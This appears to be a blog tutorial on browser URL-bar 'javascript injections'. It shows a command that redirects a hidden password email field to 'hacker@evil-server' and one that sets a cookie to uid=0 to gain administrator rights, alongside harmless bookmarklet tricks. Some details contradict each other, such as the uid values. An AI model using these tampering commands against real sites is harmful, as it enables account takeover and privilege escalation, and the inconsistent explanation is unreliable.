Javascript injections

Javascript injections are simple to find and exploit. They’re used for editing client side data, mainly html forms and cookies. The only two commands that are of any use are void and alert. Alert is really simple understand just by looking at the pop up. Void is quite different, it’s used to modify forms or cookies.

Form editing:

Now it’s really simple to edit some form variables to change fiend names of even values. Lets imagine a page that sends the admin his password every time he clicks on a button:



input name=”email” value=”admin@some-rand-host.com” type=”hidden”
input name=”submit” value=”Send Mail” type=”submit”

Now we can see that in this cut of code that the main idea is to send an email to the hard coded address in the page (admin@some-rand-host). This is where javascript comes in handy to change the target email address:

This should be written directly into the url bar:

javascript:void(document.forms[0].email.value="hacker@evil-server")

Then we run the code by charging the url, then to view the results all you have to do is refresh the page.

Now read understanding the line:
first running the command : javascript:void()
then we define the variable we want to change: document.forms[0].email.value.
This means that we want to modify one of the forms inside the document, actually the form number 0. If it was the second form in then page then we would use: document.forms[1].email.value. Next we precise the name of the input control we want to modify followed by the field: … email.value.
So there you have it, you change the address of the recipient to your own for example then send a mail ;)

Cookie editing:

Cookies are used to keep simple variables and values on a client machine inside temporary internet files, cookies. These cookies could be used for example to keep track of your connection status, current theme, or in the worst cases: your user rights. It’s probably the simplest way but also the most unsure and dangerous for the webmaster, use cookies to keep track of the user rights. To see the cookies that a site serves us we can use the alert command again: javascript:alert(document.cookie) From there we can see if there are any vulnerable fields that we might be able to inject and control. Imagine a cookie like this one:

use_theme=darkblue;user_name=hackr;uid=2;

Now you can see that the cookie actually holds onto the variable “rights” which means that we can easily try to change it’s value and check out the results by running a command like this one:

javascript:void(document.cookie="uid=0")

With that line we just changed the value of uid from 2 to 1 which means that if the website treats uid 0 users as administrators then we are now admins ;) Thankfully this is a vulnerability based on trusting users that’s being found less and less in the wild.

  1. Try these injections:
    • javascript:alert(“Hello!”);
      • This will bring up an alert box saying “Hello!”
    • javascript:alert(“Hello”); alert(“World”);
      • This will bring up 2 alert boxes. The one in the front will say “Hello” and once you click OK, the one saying “World” will appear.
    • javascript:alert(document.forms[0].to.value=”something”)
      • This will change the value of form [0] to something.
    • javascript:void(document.bgColor=”blue”)
      • This will change the background color to blue. You can put any other color in the place of blue to change it to a different color.
    • javascript:alert(“The actual url is:\t\t” + location.protocol + “//” + location.hostname + “/” + “\nThe address URL is:\t\t” + location.href + “\n” + “\nIf the server names do not match, this may be a spoof.”);
      • This long injection will tell you the real server name of the site you are looking at. You should use it if you think that you are viewing a spoofed website. Or anytime just to make sure.
    • javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.images; DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position=’absolute’; DIS.left=Math.sin(R*x1+i*x2+x3)*x4+x5; DIS.top=Math.cos(R*y1+i*y2+y3)*y4+y5}R++}setInterval(‘A()’,5); void(0);
      • This long injection will make pictures fly around. Make sure to find a site like Google Images so there are more pictures!(If you press the refresh button, it goes really fast! might only work with MAC)
  2. javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.images; DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position=’absolute’; DIS.left=Math.cos(R*x1+i*x1+x2)*x4+x5; DIS.top=Math.cos(R*y1+i*y2+y3)*y4+y5}R++}setInterval(‘A()’,5); void(0);
  3. Note that this is an alternate to the spinning circle of pictures. It funnels the pictures in a snake-like motion.
    • javascript:document.body.contentEditable=’true’;document.designMode=’on’;void0
  4. Note that this injection allows you to move things around on the webpage. However, any changes you make here are not permanent, and can only be seen by you.

You can leave a response, or trackback from your own site.

Leave a Reply